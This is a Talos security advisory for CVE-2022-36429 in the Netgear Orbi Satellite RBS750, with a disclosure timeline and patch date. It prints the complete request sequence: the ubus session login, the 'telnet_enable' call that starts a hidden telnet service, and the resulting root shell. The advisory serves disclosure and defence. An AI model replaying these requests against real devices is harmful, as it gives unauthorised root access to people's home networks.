CVE-2022-36429
A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Netgear Orbi Satellite RBS750 4.6.8.5
Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-912 - Hidden Functionality
The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.
Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.
The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:
POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 217
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
This will return a ‘ubus_rpc_session’ token needed to start the hidden telnet service:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 829
Connection: close
Date: Mon, 11 Jul 2022 19:27:03 GMT
Server: lighttpd/1.4.45
{"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
Once this token is retrieved we simply need to add a parameter called ‘telnet_enable’ to start the service:
POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 138
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/status.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:
$ telnet 10.0.0.4
Trying 10.0.0.4...
Connected to 10.0.0.4.
Escape character is '^]'.
login: admin
Password: === IMPORTANT ============================
Use 'passwd' to set your login password
this will disable telnet and enable SSH
------------------------------------------
BusyBox v1.30.1 () built-in shell (ash)
MM NM MMMMMMM M M
$MMMMM MMMMM MMMMMMMMMMM MMM MMM
MMMMMMMM MM MMMMM. MMMMM:MMMMMM: MMMM MMMMM
MMMM= MMMMMM MMM MMMM MMMMM MMMM MMMMMM MMMM MMMMM'
MMMM= MMMMM MMMM MM MMMMM MMMM MMMM MMMMNMMMMM
MMMM= MMMM MMMMM MMMMM MMMM MMMM MMMMMMMM
MMMM= MMMM MMMMMM MMMMM MMMM MMMM MMMMMMMMM
MMMM= MMMM MMMMM, NMMMMMMMM MMMM MMMM MMMMMMMMMMM
MMMM= MMMM MMMMMM MMMMMMMM MMMM MMMM MMMM MMMMMM
MMMM= MMMM MM MMMM MMMM MMMM MMMM MMMM MMMM
MMMM$ ,MMMMM MMMMM MMMM MMM MMMM MMMMM MMMM MMMM
MMMMMMM: MMMMMMM M MMMMMMMMMMMM MMMMMMM MMMMMMM
MMMMMM MMMMN M MMMMMMMMM MMMM MMMM
MMMM M MMMMMMM M M
M
---------------------------------------------------------------
For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
---------------------------------------------------------------
root@RBS750:/#
2022-08-30 - Initial Vendor Contact
2022-09-05 - Vendor Disclosure
2023-01-19 - Vendor Patch Release
2023-03-21 - Public Release
Discovered by Dave McDaniel of Cisco Talos.